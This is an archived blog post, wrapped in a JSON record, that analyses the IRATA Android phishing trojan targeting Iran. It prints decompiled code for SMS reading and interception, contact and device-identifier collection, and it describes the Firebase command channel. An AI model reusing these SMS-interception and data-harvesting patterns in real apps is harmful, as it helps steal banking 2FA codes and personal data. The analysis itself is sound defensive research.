{
	"id": "6bcb955b-dc05-459d-8689-ef5f28482db8",
	"created_at": "2026-04-06T00:14:28.74076Z",
	"updated_at": "2026-04-10T03:20:03.231256Z",
	"deleted_at": null,
	"sha1_hash": "893f0adbc9bc565d0dfe8621c7964f3ca488d65f",
	"title": "Technical analysis of IRATA android malware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 672321,
	"plain_text": "Technical analysis of IRATA android malware\nBy Muhammad Hasan Ali\nPublished: 2022-08-26 · Archived: 2026-04-06 00:02:52 UTC\n23 minute read\nIn the name of God, the Most Gracious, the Most Merciful\nFreePalestine\nIntroduction\nIn this blog, we will talk about IRATA. IRATA is delivered through a phishing campaign targeting Iran. The victim receives a legitimate-looking SMS with a link to a phishing page that impersonates government services and lures them into downloading a malicious Android application and then paying a small fee for the \"service\". The malicious application not only collects the victim's credit card numbers, but also gains access to the 2FA codes delivered by SMS and turns the victim's device into a bot that spreads similar phishing SMS to other potential victims.\nTechnical review\nCollect SMS: the malware collects the victim's SMS messages and uploads them to the C2 server.\nBypass 2FA: after stealing the card data, the stolen SMS give the attacker the one-time codes the bank sends to confirm the withdrawal.\nSpam: the malware collects contacts and sends phishing SMS to them.\nFCM: Firebase Cloud Messaging (FCM) is used as the command channel, so commands reach the bot through Google's push infrastructure rather than from a suspicious domain; the stolen data is still posted to the operator's own HTTP server (see the IoC section).\nStatic analysis\nExplore AndroidManifest.xml\nThe AndroidManifest.xml inside an APK is stored in a binary XML encoding and is not human-readable, so we first decode the APK with apktool (apktool d sample.apk) and then open the decoded AndroidManifest.xml. We read this file to learn what the APK can do: the package name, its entry points (activities, services and receivers), intent filters, and the permissions it requests. https://muha2xmad.github.io/malware-analysis/irata/\nPage 1 of 23\n\nAs we see, the malware requests the permissions to read SMS, read contacts, and read the phone state. 
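The manifest review above is the kind of check worth scripting. The following is an added example, not code from the post or from the malware itself: it parses a decoded AndroidManifest.xml with Python's standard library and flags the permission combinations that matter for this family (SMS read plus send plus contacts, and the push-receive permission together with an FCM message service, which points at a push command channel). The manifest embedded in it is a constructed sample carrying the permissions the post names, not the real IRATA manifest, which the post only shows as a screenshot; the bucket names and verdict strings are this example's own.

```python
# Added example (not from the original post): triage the permissions and
# components declared in a decoded AndroidManifest.xml, as a repeatable form of
# the manual manifest read above. Uses only the Python standard library.
import sys
import xml.etree.ElementTree as ET

ANDROID_NS = 'http://schemas.android.com/apk/res/android'
NAME_ATTR = '{' + ANDROID_NS + '}name'      # android:name in Clark notation
FCM_ACTION = 'com.google.firebase.MESSAGING_EVENT'

# Capability buckets that matter for an SMS-stealing / SMS-spreading bot.
BUCKETS = {
    'sms_read':    {'android.permission.READ_SMS', 'android.permission.RECEIVE_SMS'},
    'sms_send':    {'android.permission.SEND_SMS'},
    'contacts':    {'android.permission.READ_CONTACTS'},
    'phone_state': {'android.permission.READ_PHONE_STATE'},
    'push_c2':     {'com.google.android.c2dm.permission.RECEIVE'},
}

def requested_permissions(root):
    '''All android:name values of uses-permission elements.'''
    return {e.get(NAME_ATTR) for e in root.iter('uses-permission') if e.get(NAME_ATTR)}

def has_fcm_service(root):
    '''True if some component registers for FCM message delivery.'''
    return any(a.get(NAME_ATTR) == FCM_ACTION for a in root.iter('action'))

def triage(manifest_xml):
    '''Return the package name, bucket hits and plain-language verdicts.'''
    root = ET.fromstring(manifest_xml)
    perms = requested_permissions(root)
    hits = {b: sorted(perms & names) for b, names in BUCKETS.items() if perms & names}
    fcm = has_fcm_service(root)
    verdicts = []
    if 'sms_read' in hits:
        verdicts.append('can read OTP/2FA codes delivered by SMS')
    if 'sms_read' in hits and 'sms_send' in hits and 'contacts' in hits:
        verdicts.append('SMS-worm pattern: read inbox, harvest contacts, send SMS')
    if 'push_c2' in hits and fcm:
        verdicts.append('receives push messages: possible FCM command channel')
    return {'package': root.get('package'), 'hits': hits,
            'fcm_service': fcm, 'verdicts': verdicts}

# Constructed sample: it requests the permissions the post names, but it is not
# the real IRATA manifest (the post only shows that as a screenshot).
SAMPLE_MANIFEST = '''<manifest xmlns:android='http://schemas.android.com/apk/res/android'
          package='com.example.constructed'>
    <uses-permission android:name='android.permission.INTERNET'/>
    <uses-permission android:name='android.permission.READ_SMS'/>
    <uses-permission android:name='android.permission.RECEIVE_SMS'/>
    <uses-permission android:name='android.permission.SEND_SMS'/>
    <uses-permission android:name='android.permission.READ_CONTACTS'/>
    <uses-permission android:name='android.permission.READ_PHONE_STATE'/>
    <uses-permission android:name='com.google.android.c2dm.permission.RECEIVE'/>
    <application android:label='Gov Service'>
        <service android:name='.firebasemessaging'>
            <intent-filter>
                <action android:name='com.google.firebase.MESSAGING_EVENT'/>
            </intent-filter>
        </service>
    </application>
</manifest>'''

if __name__ == '__main__':
    # Usage: python triage_manifest.py path/to/decoded/AndroidManifest.xml
    # (script name is arbitrary; with no argument the built-in sample is used)
    text = open(sys.argv[1], encoding='utf-8').read() if len(sys.argv) > 1 else SAMPLE_MANIFEST
    report = triage(text)
    print('package:', report['package'])
    for bucket, names in sorted(report['hits'].items()):
        print(bucket + ':', ', '.join(names))
    for verdict in report['verdicts']:
        print('VERDICT:', verdict)
```

The bucket approach is deliberately coarse: a manifest alone cannot tell you whether a permission is used, which is exactly why the next step below is to check each suspicious class for callers.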
This is the profile of spyware that reads your SMS and your contacts in order to find more victims to send phishing SMS to.\ncom.google.android.c2dm.permission.RECEIVE is the permission for receiving push messages from Google's cloud messaging service (GCM/FCM); the app needs it because it takes its commands from the C2 over Firebase.\nBIND_GET_INSTALL_REFERRER_SERVICE is used by the Firebase SDK (through the Play Install Referrer API) to learn where the app was installed from.\nOnce the app is granted the SMS-related permissions, the malware collects the SMS from the victim's phone and uploads them to the C2 server.\nDive into classes.dex\nWe unzip the APK file to get classes.dex, which holds the compiled Java code in dex form. We convert classes.dex into a .jar file with the d2j-dex2jar classes.dex command and then open it in JD-GUI or JADX-GUI (JADX-GUI is used here). If you have the JEB decompiler, you can just drag and drop the classes.dex file. JADX can also open the APK directly, without the dex2jar step.\nDigging into the classes and methods, under anywheresoftware then phone we see some classes the malware could use for its malicious activities. The anywheresoftware.b4a.* packages belong to the B4A (Basic4Android) runtime and its Phone library, which is bundled into every app built with B4A; that is why several of these classes turn out to be present but unused, and why we check each one with find usage instead of assuming the malware calls it.\nFigure(1) malicious activities\nWe see the CallLogWrapper class, which can collect the victim's call logs and their details such as date, type, duration, number, _id. 
Such data could then be sent to the C2 server.\n@BA.ShortName(\"CallLog\")\n/* loaded from: classes-dex2jar.jar:anywheresoftware/b4a/phone/CallLogWrapper.class */\npublic class CallLogWrapper {\n private static final String[] calls_projection = {\"date\", \"type\", \"duration\", \"number\", \"_id\", AppMeasuremen\n @BA.ShortName(\"CallItem\")\n /* loaded from: classes-dex2jar.jar:anywheresoftware/b4a/phone/CallLogWrapper$CallItem.class */\n public static class CallItem {\n public static final int TYPE_INCOMING = 1;\n public static final int TYPE_MISSED = 3;\n public static final int TYPE_OUTGOING = 2;\n public String CachedName;\n public int CallType;\n public long Date;\n public long Duration;\n public int Id;\n public String Number;\n public CallItem() {\n this.Id = -1;\n this.CachedName = \"\";\n }\n CallItem(String str, int i, long j, int i2, long j2, String str2) {\n this.Id = -1;\n this.CachedName = \"\";\n this.Number = str == null ? \"\" : str;\n this.Id = i;\n this.CallType = i2;\n this.Duration = j;\n this.Date = j2;\n this.CachedName = str2 == null ? \"\" : str2;\n }\n public String toString() {\n return \"Id=\" + this.Id + \", Number=\" + this.Number + \",CachedName=\" + this.CachedName + \", Type=\" +\n }\n }\nBut how do we know that this class is even used? We check whether it is called from other classes using find usage in jadx-gui: right-click CallLogWrapper, then find usage(x). We see it is not used by any class.\nFigure(2) `CallLogWrapper` is not used\nThen we go to ContactsWrapper, which can collect the victim's contacts and their details such as times_contacted, number, last_time_contacted, display_name. The wrapper can also return the email addresses linked to a contact, typed as EMAIL_HOME, EMAIL_CUSTOM and so on. 
It even returns the contact's photo if one is stored.\n@BA.ShortName(\"Contacts\")\n/* loaded from: classes-dex2jar.jar:anywheresoftware/b4a/phone/ContactsWrapper.class */\npublic class ContactsWrapper {\n private static final String[] people_projection = {\"times_contacted\", \"number\", \"last_time_contacted\", \"disp\n @BA.ShortName(\"Contact\")\n /* loaded from: classes-dex2jar.jar:anywheresoftware/b4a/phone/ContactsWrapper$Contact.class */\n public static class Contact {\n public static final int EMAIL_CUSTOM = 0;\n public static final int EMAIL_HOME = 1;\n public static final int EMAIL_MOBILE = 4;\n public static final int EMAIL_OTHER = 3;\n public static final int EMAIL_WORK = 2;\n public static final int PHONE_CUSTOM = 0;\n public static final int PHONE_FAX_HOME = 5;\n public static final int PHONE_FAX_WORK = 4;\n public static final int PHONE_HOME = 1;\n public static final int PHONE_MOBILE = 2;\n public static final int PHONE_OTHER = 7;\n public static final int PHONE_PAGER = 6;\n public static final int PHONE_WORK = 3;\n public String DisplayName;\n public int Id;\n public long LastTimeContacted;\n public String Name;\n public String Notes;\n public String PhoneNumber;\n public boolean Starred;\n public int TimesContacted;\n public Contact() {\n this.PhoneNumber = \"\";\n this.Id = -1;\n }\n /* JADX INFO: Access modifiers changed from: package-private */\n public Contact(String str, String str2, boolean z, int i, String str3, int i2, long j, String str4) {\n this.PhoneNumber = \"\";\n this.Id = -1;\n this.DisplayName = str == null ? \"\" : str;\n this.PhoneNumber = str2 == null ? \"\" : str2;\n this.Starred = z;\n this.Id = i;\n this.Notes = str3 == null ? \"\" : str3;\n this.TimesContacted = i2;\n this.LastTimeContacted = j;\n this.Name = str4 == null ? \"\" : str4;\n }\n public Map GetEmails() {\n if (this.Id != -1) {\n Cursor query = BA.applicationContext.getContentResolver().query(Uri.withAppendedPath(ContentUris\n Map map = new Map();\n map.Initialize();\n while (query.moveToNext()) {\n map.Put(query.getString(0), Integer.valueOf(query.getInt(1)));\n }\n query.close();\n return map;\n }\n throw new RuntimeException(\"Contact object should be set by calling one of the Contacts methods.\");\n }\n public Map GetPhones() {\n if (this.Id != -1) {\n Cursor query = BA.applicationContext.getContentResolver().query(Uri.withAppendedPath(ContentUris\n Map map = new Map();\n map.Initialize();\n while (query.moveToNext()) {\n map.Put(query.getString(0), Integer.valueOf(query.getInt(1)));\n }\n query.close();\n return map;\n }\n throw new RuntimeException(\"Contact object should be set by calling one of the Contacts methods.\");\n }\n public CanvasWrapper.BitmapWrapper GetPhoto() {\n if (this.Id != -1) {\n Cursor query = BA.applicationContext.getContentResolver().query(Uri.withAppendedPath(ContentUris\n CanvasWrapper.BitmapWrapper bitmapWrapper = null;\n if (query.moveToNext()) {\n byte[] blob = query.getBlob(0);\n bitmapWrapper = null;\n if (blob != null) {\n File.InputStreamWrapper inputStreamWrapper = new File.InputStreamWrapper();\n inputStreamWrapper.InitializeFromBytesArray(blob, 0, blob.length);\n bitmapWrapper = new CanvasWrapper.BitmapWrapper();\n bitmapWrapper.Initialize2(inputStreamWrapper.getObject());\n }\n }\n query.close();\n return bitmapWrapper;\n }\n throw new RuntimeException(\"Contact object should be set by calling one of the Contacts methods.\");\n }\n public String toString() {\n return \"DisplayName=\" + this.DisplayName + \", PhoneNumber=\" + this.PhoneNumber + \", 
Starred=\" + this\n }\n }\n private List getAllContacts(String str, String[] strArr) {\n Cursor query = BA.applicationContext.getContentResolver().query(Contacts.People.CONTENT_URI, people_proj\n List list = new List();\n list.Initialize();\n HashMap hashMap = new HashMap();\n for (int i = 0; i \u003c query.getColumnCount(); i++) {\n hashMap.put(query.getColumnName(i), Integer.valueOf(i));\n }\n while (query.moveToNext()) {\n list.Add(new Contact(query.getString(((Integer) hashMap.get(\"display_name\")).intValue()), query.getS\n }\n query.close();\n return list;\n }\nThis class is not used by any other class either.\nNext is the PackageManager class, which can retrieve information about all installed packages on the victim's phone, such as the package name and version code. Banking trojans typically use such a list for overlay attacks: the malware opens a window on top of a legitimate app that looks identical to it, and the victim enters his/her credentials into it. 
The malware could then capture the victim's payment or login data. But there is no indication of an overlay attack in this sample; the class is part of the B4A Phone library.\n@BA.ShortName(\"PackageManager\")\n/* loaded from: classes-dex2jar.jar:anywheresoftware/b4a/phone/PackageManagerWrapper.class */\npublic class PackageManagerWrapper {\n private PackageManager pm = BA.applicationContext.getPackageManager();\n public Drawable GetApplicationIcon(String str) throws PackageManager.NameNotFoundException {\n return this.pm.getApplicationIcon(str);\n }\n public IntentWrapper GetApplicationIntent(String str) {\n IntentWrapper intentWrapper = new IntentWrapper();\n intentWrapper.setObject(this.pm.getLaunchIntentForPackage(str));\n return intentWrapper;\n }\n public String GetApplicationLabel(String str) throws PackageManager.NameNotFoundException {\n PackageManager packageManager = this.pm;\n CharSequence applicationLabel = packageManager.getApplicationLabel(packageManager.getApplicationInfo(str\n return applicationLabel == null ? \"\" : applicationLabel.toString();\n }\n public List GetInstalledPackages() {\n List list = new List();\n java.util.List\u003cPackageInfo\u003e installedPackages = this.pm.getInstalledPackages(0);\n list.Initialize();\n for (PackageInfo packageInfo : installedPackages) {\n list.Add(packageInfo.packageName);\n }\n return list;\n }\n public int GetVersionCode(String str) throws PackageManager.NameNotFoundException {\n return this.pm.getPackageInfo(str, 0).versionCode;\n }\n public String GetVersionName(String str) throws PackageManager.NameNotFoundException {\n return this.pm.getPackageInfo(str, 0).versionName;\n }\n public List QueryIntentActivities(Intent intent) {\n java.util.List\u003cResolveInfo\u003e queryIntentActivities = this.pm.queryIntentActivities(intent, 0);\n List list = new List();\n list.Initialize();\n for (ResolveInfo resolveInfo : queryIntentActivities) {\n list.Add(new ComponentName(resolveInfo.activityInfo.packageName, resolveInfo.activityInfo.name).flat\n }\n return list;\n }\n}\nThis class is not used by any other class either.\nNext we go to the Phone class. Through it the malware can read the state of the phone, such as whether the ringer is RINGER_SILENT or RINGER_NORMAL and more, and the command handler shown later uses it to change the ringer mode and volumes. It also contains a nested Email helper. 
This Email class is not an interceptor: it builds an outgoing email (an android.intent.action.SEND_MULTIPLE intent) with To, CC and BCC recipients, a subject, a body and attachments, and hands it to whatever mail client is installed, so it could only be used to send data out, not to read the victim's mail.\n@BA.ShortName(\"Email\")\n /* loaded from: classes-dex2jar.jar:anywheresoftware/b4a/phone/Phone$Email.class */\n public static class Email {\n public String Subject = \"\";\n public String Body = \"\";\n public List To = new List();\n public List CC = new List();\n public List BCC = new List();\n public List Attachments = new List();\n public Email() {\n this.To.Initialize();\n this.CC.Initialize();\n this.BCC.Initialize();\n this.Attachments.Initialize();\n }\n private Intent getIntent(boolean z) {\n Intent intent = new Intent(\"android.intent.action.SEND_MULTIPLE\");\n intent.setType(z ? \"text/html\" : \"text/plain\");\n intent.putExtra(\"android.intent.extra.EMAIL\", (String[]) this.To.getObject().toArray(new String[0]))\n intent.putExtra(\"android.intent.extra.CC\", (String[]) this.CC.getObject().toArray(new String[0]));\n intent.putExtra(\"android.intent.extra.BCC\", (String[]) this.BCC.getObject().toArray(new String[0]));\n intent.putExtra(\"android.intent.extra.SUBJECT\", this.Subject);\n intent.putExtra(\"android.intent.extra.TEXT\", z ? Html.fromHtml(this.Body) : this.Body);\n ArrayList\u003c? 
extends Parcelable\u003e arrayList = new ArrayList\u003c\u003e();\n for (Object obj : this.Attachments.getObject()) {\n if (obj instanceof Uri) {\n arrayList.add((Uri) obj);\n } else {\n arrayList.add(Uri.fromFile(new java.io.File((String) obj)));\n }\n }\n if (arrayList.size() == 1) {\n intent.putExtra(\"android.intent.extra.STREAM\", arrayList.get(0));\n intent.setAction(IntentWrapper.ACTION_SEND);\n } else if (arrayList.size() \u003e 1) {\n intent.putParcelableArrayListExtra(\"android.intent.extra.STREAM\", arrayList);\n }\n return intent;\n }\nThe nested PhoneId helper exposes SIM and device identifiers: the device ID (IMEI/MEID), the line number, the SIM serial number (ICCID) and the subscriber ID (IMSI). On Android 10 and later these TelephonyManager getters are no longer available to ordinary apps (they return null or throw a SecurityException depending on the target SDK), so on a current device the empty-string fallbacks below are what the malware actually gets.\n@BA.ShortName(\"PhoneId\")\n /* loaded from: classes-dex2jar.jar:anywheresoftware/b4a/phone/Phone$PhoneId.class */\n public static class PhoneId {\n public static String GetDeviceId() {\n String deviceId = ((TelephonyManager) BA.applicationContext.getSystemService(\"phone\")).getDeviceId()\n String str = deviceId;\n if (deviceId == null) {\n str = \"\";\n }\n return str;\n }\n public static String GetLine1Number() {\n String line1Number = ((TelephonyManager) BA.applicationContext.getSystemService(\"phone\")).getLine1Nu\n String str = line1Number;\n if (line1Number == null) {\n str = \"\";\n }\n return str;\n }\n public static String GetSimSerialNumber() {\n String simSerialNumber = ((TelephonyManager) BA.applicationContext.getSystemService(\"phone\")).getSim\n String str = simSerialNumber;\n if (simSerialNumber == null) {\n str = \"\";\n }\n return str;\n }\n public static String GetSubscriberId() {\n String subscriberId = ((TelephonyManager) BA.applicationContext.getSystemService(\"phone\")).getSubscr\n String str = subscriberId;\n if (subscriberId == null) {\n str = \"\";\n }\n return str;\n }\n }\nThe malware can also collect info about the lock of 
the phone (whether it has a lock or not), keep the phone awake, or use voice lock; it also gets the network type through GetNetworkType() and the phone type through GetPhoneType().\nNext is the PhoneEvents class. Its nested SMSInterceptor registers a BroadcastReceiver for android.provider.Telephony.SMS_RECEIVED, decodes each PDU into an SmsMessage and raises an event to the B4A code with the message. If the event handler returns true, abortBroadcast() is called so that lower-priority receivers never see the message; the filter priority comes from the Initialize2 argument. Note that since Android 4.4 (KitKat) only the default SMS app can stop a message from reaching the inbox, so abortBroadcast() no longer hides the 2FA SMS from the victim on current devices, but the malware still gets its own copy of every incoming message. ListenToOutgoingMessages registers a ContentObserver on content://sms and raises a _messagesent event when the newest row has type 2 (TYPE_SENT) and a null protocol, i.e. a message the victim has just sent.\n @BA.ShortName(\"SmsInterceptor\")\n /* loaded from: classes-dex2jar.jar:anywheresoftware/b4a/phone/PhoneEvents$SMSInterceptor.class */\n public static class SMSInterceptor {\n private BA ba;\n private BroadcastReceiver br;\n private String eventName;\n public void Initialize(String str, BA ba) {\n Initialize2(str, ba, 0);\n }\n public void Initialize2(String str, final BA ba, int i) {\n this.ba = ba;\n this.eventName = str.toLowerCase(BA.cul);\n this.br = new BroadcastReceiver() { // from class: anywheresoftware.b4a.phone.PhoneEvents.SMSInterce\n @Override // android.content.BroadcastReceiver\n public void onReceive(Context context, Intent intent) {\n Bundle extras;\n SMSInterceptor sMSInterceptor;\n if (intent.getAction().equals(\"android.provider.Telephony.SMS_RECEIVED\") \u0026\u0026 (extras = intent\n for (Object obj : (Object[]) extras.get(\"pdus\")) {\n SmsMessage createFromPdu = SmsMessage.createFromPdu((byte[]) obj);\n Boolean bool = (Boolean) ba.raiseEvent(SMSInterceptor.this, String.valueOf(sMSInterc\n if (bool != null \u0026\u0026 bool.booleanValue()) {\n abortBroadcast();\n }\n }\n }\n }\n };\n IntentFilter intentFilter = new IntentFilter(\"android.provider.Telephony.SMS_RECEIVED\");\n intentFilter.setPriority(i);\n BA.applicationContext.registerReceiver(this.br, intentFilter);\n }\n public void ListenToOutgoingMessages() {\n final Uri parse = Uri.parse(\"content://sms\");\n BA.applicationContext.getContentResolver().registerContentObserver(parse, true, new ContentObserver(\n @Override // 
android.database.ContentObserver\n public void onChange(boolean z) {\n super.onChange(z);\n Cursor query = BA.applicationContext.getContentResolver().query(parse, null, null, null, nul\n if (query.moveToNext()) {\n String string = query.getString(query.getColumnIndex(\"protocol\"));\n int i = query.getInt(query.getColumnIndex(\"type\"));\n if (string == null \u0026\u0026 i == 2) {\n BA ba = SMSInterceptor.this.ba;\n ba.raiseEvent(null, String.valueOf(SMSInterceptor.this.eventName) + \"_messagesent\",\n query.close();\n }\n }\n }\n });\n }\nThe PhoneEvents constructor also maps system broadcasts to events, so the malware can learn about the state of the phone: shutdown, screen on or off, user present, an app removed or added, connectivity and airplane-mode changes, battery level, low storage, and the sent/delivered status of SMS it sends itself (b4a.smssent and b4a.smsdelivered).\npublic PhoneEvents() {\n HashMap\u003cString, ActionHandler\u003e hashMap = new HashMap\u003c\u003e();\n this.map = hashMap;\n hashMap.put(\"android.speech.tts.TTS_QUEUE_PROCESSING_COMPLETED\", new ActionHandler(this) { // from class\n /* JADX WARN: 'super' call moved to the top of the method (can break code semantics) */\n {\n super(this, null);\n this.event = \"_texttospeechfinish\";\n }\n @Override // anywheresoftware.b4a.phone.PhoneEvents.ActionHandler\n public void handle(Intent intent) {\n send(intent, null);\n }\n });\n this.map.put(\"android.net.conn.CONNECTIVITY_CHANGE\", new ActionHandler(this) { // from class: anywhereso\n /* JADX WARN: 'super' call moved to the top of the method (can break code semantics) */\n {\n super(this, null);\n this.event = \"_connectivitychanged\";\n }\n @Override // anywheresoftware.b4a.phone.PhoneEvents.ActionHandler\n public void handle(Intent intent) {\n NetworkInfo networkInfo = (NetworkInfo) intent.getParcelableExtra(\"networkInfo\");\n send(intent, new Object[]{networkInfo.getTypeName(), networkInfo.getState().toString()});\n }\n });\n 
this.map.put(\"android.intent.action.USER_PRESENT\", new ActionHandler(this) { // from class: anywheresoft\n /* JADX WARN: 'super' call moved to the top of the method (can break code semantics) */\n {\n super(this, null);\n this.event = \"_userpresent\";\n }\n @Override // anywheresoftware.b4a.phone.PhoneEvents.ActionHandler\n public void handle(Intent intent) {\n send(intent, null);\n }\n });\n this.map.put(\"android.intent.action.ACTION_SHUTDOWN\", new ActionHandler(this) { // from class: anywheres\n /* JADX WARN: 'super' call moved to the top of the method (can break code semantics) */\n {\n super(this, null);\n this.event = \"_shutdown\";\n }\n @Override // anywheresoftware.b4a.phone.PhoneEvents.ActionHandler\n public void handle(Intent intent) {\n send(intent, null);\n }\n });\n this.map.put(\"android.intent.action.SCREEN_ON\", new ActionHandler(this) { // from class: anywheresoftwar\n /* JADX WARN: 'super' call moved to the top of the method (can break code semantics) */\n {\n super(this, null);\n this.event = \"_screenon\";\n }\n @Override // anywheresoftware.b4a.phone.PhoneEvents.ActionHandler\n public void handle(Intent intent) {\n send(intent, null);\n }\n });\n this.map.put(\"android.intent.action.SCREEN_OFF\", new ActionHandler(this) { // from class: anywheresoftwa\n /* JADX WARN: 'super' call moved to the top of the method (can break code semantics) */\n {\n super(this, null);\n this.event = \"_screenoff\";\n }\n @Override // anywheresoftware.b4a.phone.PhoneEvents.ActionHandler\n public void handle(Intent intent) {\n send(intent, null);\n }\n });\n this.map.put(\"android.intent.action.PACKAGE_REMOVED\", new ActionHandler(this) { // from class: anywheres\n /* JADX WARN: 'super' call moved to the top of the method (can break code semantics) */\n {\n super(this, null);\n this.event = \"_packageremoved\";\n }\n @Override // anywheresoftware.b4a.phone.PhoneEvents.ActionHandler\n public void handle(Intent intent) {\n send(intent, new Object[]{intent.getDataString()});\n }\n });\n this.map.put(\"android.intent.action.PACKAGE_ADDED\", new ActionHandler(this) { // from class: anywheresof\n /* JADX WARN: 'super' call moved to the top of the method (can break code semantics) */\n {\n super(this, null);\n this.event = \"_packageadded\";\n }\n @Override // anywheresoftware.b4a.phone.PhoneEvents.ActionHandler\n public void handle(Intent intent) {\n send(intent, new Object[]{intent.getDataString()});\n }\n });\n this.map.put(\"android.intent.action.DEVICE_STORAGE_LOW\", new ActionHandler(this) { // from class: anywhe\n /* JADX WARN: 'super' call moved to the top of the method (can break code semantics) */\n {\n super(this, null);\n this.event = \"_devicestoragelow\";\n }\n @Override // anywheresoftware.b4a.phone.PhoneEvents.ActionHandler\n public void handle(Intent intent) {\n send(intent, null);\n }\n });\n this.map.put(\"b4a.smssent\", new ActionHandler(this) { // from class: anywheresoftware.b4a.phone.PhoneEve\n /* JADX WARN: 'super' call moved to the top of the method (can break code semantics) */\n {\n super(this, null);\n this.event = \"_smssentstatus\";\n }\n @Override // anywheresoftware.b4a.phone.PhoneEvents.ActionHandler\n public void handle(Intent intent) {\n int i = this.resultCode;\n send(intent, new Object[]{Boolean.valueOf(this.resultCode == -1), i != -1 ? i != 1 ? i != 2 ? i\n }\n });\n this.map.put(\"b4a.smsdelivered\", new ActionHandler(this) { // from class: anywheresoftware.b4a.phone.Pho\n /* JADX WARN: 'super' call moved to the top of the method (can break code semantics) */\n {\n super(this, null);\n this.event = \"_smsdelivered\";\n }\n @Override // anywheresoftware.b4a.phone.PhoneEvents.ActionHandler\n public void handle(Intent intent) {\n send(intent, new Object[]{intent.getStringExtra(\"phone\")});\n }\n });\n this.map.put(\"android.intent.action.DEVICE_STORAGE_OK\", new ActionHandler(this) { // from class: anywher\n /* JADX WARN: 'super' call moved to the top of the method (can break code semantics) */\n {\n super(this, null);\n this.event = \"_devicestorageok\";\n }\n @Override // anywheresoftware.b4a.phone.PhoneEvents.ActionHandler\n public void handle(Intent intent) {\n send(intent, null);\n }\n });\n this.map.put(\"android.intent.action.BATTERY_CHANGED\", new ActionHandler(this) { // from class: anywheres\n /* JADX WARN: 'super' call moved to the top of the method (can break code semantics) */\n {\n super(this, null);\n this.event = \"_batterychanged\";\n }\n @Override // anywheresoftware.b4a.phone.PhoneEvents.ActionHandler\n public void handle(Intent intent) {\n send(intent, new Object[]{Integer.valueOf(intent.getIntExtra(FirebaseAnalytics.Param.LEVEL, 0)),\n }\n });\n this.map.put(\"android.intent.action.AIRPLANE_MODE\", new ActionHandler(this) { // from class: anywheresof\n /* JADX WARN: 'super' call moved to the top of the method (can break code semantics) */\n {\n super(this, null);\n this.event = \"_airplanemodechanged\";\n }\n @Override // anywheresoftware.b4a.phone.PhoneEvents.ActionHandler\n public void handle(Intent intent) {\n send(intent, new Object[]{Boolean.valueOf(intent.getBooleanExtra(\"state\", false))});\n }\n });\n for 
(Map.Entry\u003cString, ActionHandler\u003e entry : this.map.entrySet()) {\n entry.getValue().action = entry.getKey();\n }\n }\nThe last class is SmsWrapper. Through it the malware reads the SMS stored on the victim's phone (the content://sms provider), including _id, thread_id, address, read, type, body, person and date; this is what the getsms command later queries and uploads to the C2 server.\n@BA.ShortName(\"SmsMessages\")\n/* loaded from: classes-dex2jar.jar:anywheresoftware/b4a/phone/SmsWrapper.class */\npublic class SmsWrapper {\n public static final int TYPE_DRAFT = 3;\n public static final int TYPE_FAILED = 5;\n public static final int TYPE_INBOX = 1;\n public static final int TYPE_OUTBOX = 4;\n public static final int TYPE_QUEUED = 6;\n public static final int TYPE_SENT = 2;\n public static final int TYPE_UNKNOWN = 0;\n private static final String[] projection = {\"_id\", \"thread_id\", \"address\", \"read\", \"type\", \"body\", \"person\",\n @BA.ShortName(\"Sms\")\n /* loaded from: classes-dex2jar.jar:anywheresoftware/b4a/phone/SmsWrapper$Sms.class */\n public static class Sms {\n public String Address;\n public String Body;\n public long Date;\n public int Id;\n public int PersonId;\n public boolean Read;\n public int ThreadId;\n public int Type;\n public Sms() {\n }\n public Sms(int i, int i2, int i3, long j, boolean z, int i4, String str, String str2) {\n this.Id = i;\n this.ThreadId = i2;\n this.PersonId = i3;\n this.Date = j;\n this.Read = z;\n this.Type = i4;\n this.Body = str;\n this.Address = str2;\n }\n public String toString() {\n return \"Id=\" + this.Id + \", ThreadId=\" + this.ThreadId + \", PersonId=\" + this.PersonId + \", Date=\" +\n }\n }\nChecking its usages, we see that it is used by the firebasemessaging class.\nThis is the class where the malware receives commands and prepares the collected information to send to the C2 server. 
Commands arrive through Firebase Cloud Messaging (FCM), Google's push service, so the command channel blends in with legitimate app traffic and there is no suspicious polling to detect; the collected data, however, is posted back to the operator's HTTP server (the _apilink and _port1 values used below; see the IoC section). The class imports the B4A helpers that collect information from the victim's phone, such as PhoneEvents, SmsWrapper and Phone:\nimport android.app.Service;\nimport android.content.BroadcastReceiver;\nimport android.content.ComponentName;\nimport android.content.Context;\nimport android.content.Intent;\nimport android.os.IBinder;\nimport androidx.core.app.NotificationCompat;\nimport anywheresoftware.b4a.BA;\nimport anywheresoftware.b4a.agraham.reflection.Reflection;\nimport anywheresoftware.b4a.keywords.B4AApplication;\nimport anywheresoftware.b4a.keywords.Common;\nimport anywheresoftware.b4a.keywords.DateTime;\nimport anywheresoftware.b4a.objects.FirebaseNotificationsService;\nimport anywheresoftware.b4a.objects.IntentWrapper;\nimport anywheresoftware.b4a.objects.NotificationWrapper;\nimport anywheresoftware.b4a.objects.RuntimePermissions;\nimport anywheresoftware.b4a.objects.ServiceHelper;\nimport anywheresoftware.b4a.objects.collections.List;\nimport anywheresoftware.b4a.objects.collections.Map;\nimport anywheresoftware.b4a.objects.streams.File;\nimport anywheresoftware.b4a.phone.Phone;\nimport anywheresoftware.b4a.phone.PhoneEvents;\nimport anywheresoftware.b4a.phone.SmsWrapper;\nimport b4a.example.contactsutils;\nimport com.reza.sh.deviceinfo.DiviceInfo;\nimport java.lang.reflect.Method;\nNotificationCompat is the AndroidX notification-builder helper; the notification categories the author refers to (alarm, social, call, email) are its CATEGORY_* constants, and in this listing its GROUP_KEY_SILENT constant (the string \"silent\") is simply what the silent command is compared against, so the import by itself is not evidence of notification harvesting.\nDiviceInfo (com.reza.sh.deviceinfo) is a third-party library that returns device information such as the airplane-mode state, accounts, the Android ID and a UUID. contactsutils is the B4A ContactsUtils code module used below to enumerate contacts.\nNow, in this class the malware handles the commands the C2 server sends to the victim's phone. 
